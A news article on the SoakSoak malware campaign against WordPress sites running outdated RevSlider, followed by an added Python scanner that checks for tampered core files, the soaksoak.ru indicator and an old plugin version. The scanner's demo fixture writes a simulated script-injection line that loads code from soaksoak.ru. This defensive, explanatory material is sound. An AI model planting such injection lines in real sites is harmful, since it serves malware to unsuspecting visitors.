More than 100,000 WordPress websites have been infected with malware after attackers exploited a vulnerability in a popular WordPress plugin called RevSlider. The attack turns the infected WordPress sites into unwilling distributors of yet more malware, this time aimed at visitors to the sites.
The malware campaign has been dubbed SoakSoak because it causes some infected websites to redirect visitors to a malicious website at soaksoak.ru. In an attempt to curb the infections, Google has blacklisted over 11,000 affected WordPress domains, according to Menifee, California-based security company Sucuri.
The SoakSoak campaign works by scanning WordPress websites for outdated versions of the RevSlider plugin. Older editions of RevSlider contain a known Local File Inclusion (LFI) flaw, which lets a remote attacker trick the server into reading files on its own disk that should never be exposed, such as the site's wp-config.php with its database credentials. With that foothold, the attackers modify the site's wp-includes/js/swfobject.js file, adding malicious code that redirects visitors to soaksoak.ru.
RevSlider is a premium WordPress plugin that is often bundled with commercial WordPress themes; some site and blog operators might not even know they have it, while others might not want to pay more money to update it. Both factors help explain why SoakSoak has spread so quickly and infected so many WordPress sites.
Sucuri has a free tool that site administrators can use to check their sites for SoakSoak and other malware.
Cleaning up an infected WordPress site is possible, but can be complicated. Administrators first have to replace their sites' swfobject.js and template-loader.php files (both in the wp-includes directory) with clean copies from the same WordPress release. To avoid being reinfected, they should also update RevSlider to a patched version, which may mean paying for a new license, or remove the plugin entirely, and then put the site behind a website firewall. Because a Local File Inclusion flaw can expose files such as wp-config.php, administrators should also assume the database credentials stored there have been read and change them.
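The checks above (compare the two tampered core files against a clean copy, look for the soaksoak.ru marker, confirm the RevSlider version) can be scripted. The following is an added example written for this article, not Sucuri's scanner or any WordPress or RevSlider code: it assumes the RevSlider main file is wp-content/plugins/revslider/revslider.php with a standard WordPress plugin header, treats 4.2 as the minimum safe version (an assumption for the demo), and builds a constructed sample site so it runs offline.

```python
"""Added example: integrity and indicator scanner for a SoakSoak-style
infection, plus the first cleanup step (restoring the two core files).
Not Sucuri's tool; sample site and thresholds are constructed for the demo."""
import hashlib
import os
import re
import shutil
import tempfile

# Core files the article says the campaign alters (relative to the WP root).
TAMPERED_FILES = (
    os.path.join("wp-includes", "js", "swfobject.js"),
    os.path.join("wp-includes", "template-loader.php"),
)
INDICATOR = re.compile(rb"soaksoak\.ru", re.IGNORECASE)
# Assumption for this demo: any RevSlider older than this is treated as vulnerable.
MIN_SAFE_REVSLIDER = (4, 2)
# Assumed location of the plugin's main file (standard WordPress layout).
REVSLIDER_MAIN = os.path.join("wp-content", "plugins", "revslider", "revslider.php")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_core_files(site_root, clean_root):
    """Return the tampered-file paths whose content differs from the clean copy."""
    modified = []
    for rel in TAMPERED_FILES:
        live, clean = os.path.join(site_root, rel), os.path.join(clean_root, rel)
        if not os.path.exists(live) or sha256_of(live) != sha256_of(clean):
            modified.append(rel)
    return modified


def find_indicators(site_root):
    """Return script/PHP/HTML files under site_root that mention soaksoak.ru."""
    hits = []
    for dirpath, _, names in os.walk(site_root):
        for name in names:
            if name.endswith((".js", ".php", ".html")):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    if INDICATOR.search(fh.read()):
                        hits.append(os.path.relpath(path, site_root))
    return sorted(hits)


def revslider_version(site_root):
    """Parse 'Version:' from the plugin header; None if the plugin is absent."""
    main = os.path.join(site_root, REVSLIDER_MAIN)
    if not os.path.exists(main):
        return None
    with open(main, "r", errors="replace") as fh:
        m = re.search(r"^\s*\*?\s*Version:\s*([0-9]+(?:\.[0-9]+)*)", fh.read(), re.M)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def scan_site(site_root, clean_root):
    ver = revslider_version(site_root)
    return {
        "modified_core_files": check_core_files(site_root, clean_root),
        "indicator_hits": find_indicators(site_root),
        "revslider_version": ver,
        "revslider_outdated": ver is not None and ver < MIN_SAFE_REVSLIDER,
    }


def restore_core_files(site_root, clean_root):
    """Cleanup step from the article: overwrite both files with clean copies."""
    for rel in TAMPERED_FILES:
        shutil.copyfile(os.path.join(clean_root, rel), os.path.join(site_root, rel))


def build_sample_site():
    """Constructed demo data: a clean reference tree and an 'infected' site."""
    base = tempfile.mkdtemp(prefix="soaksoak-demo-")
    clean, site = os.path.join(base, "clean"), os.path.join(base, "site")
    for root in (clean, site):
        os.makedirs(os.path.join(root, "wp-includes", "js"))
        os.makedirs(os.path.dirname(os.path.join(root, REVSLIDER_MAIN)))
        with open(os.path.join(root, TAMPERED_FILES[0]), "w") as fh:
            fh.write("/* SWFObject placeholder */\n")
        with open(os.path.join(root, TAMPERED_FILES[1]), "w") as fh:
            fh.write("<?php // template loader placeholder\n")
    # Simulated injection (placeholder text, not the real payload).
    with open(os.path.join(site, TAMPERED_FILES[0]), "a") as fh:
        fh.write("document.write('<script src=\"http://soaksoak.ru/x\"></script>');\n")
    with open(os.path.join(site, REVSLIDER_MAIN), "w") as fh:
        fh.write("<?php\n/*\nPlugin Name: Slider Revolution\nVersion: 4.1.4\n*/\n")
    return site, clean


if __name__ == "__main__":
    site, clean = build_sample_site()
    print("before cleanup:", scan_site(site, clean))
    restore_core_files(site, clean)
    print("after cleanup: ", scan_site(site, clean))
```

Note what the second scan shows: restoring the two files clears the modified-file and indicator findings, but the plugin is still reported as outdated, which is exactly the state Sucuri describes as getting reinfected within minutes. Hash comparison against a clean release is used rather than file timestamps, since an attacker who can write the file can also reset its mtime.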
"Some users are clearing infections and getting reinfected within minutes, and the reason is because of the complex nature of the payloads and improper cleaning efforts," the Sucuri blog post warns.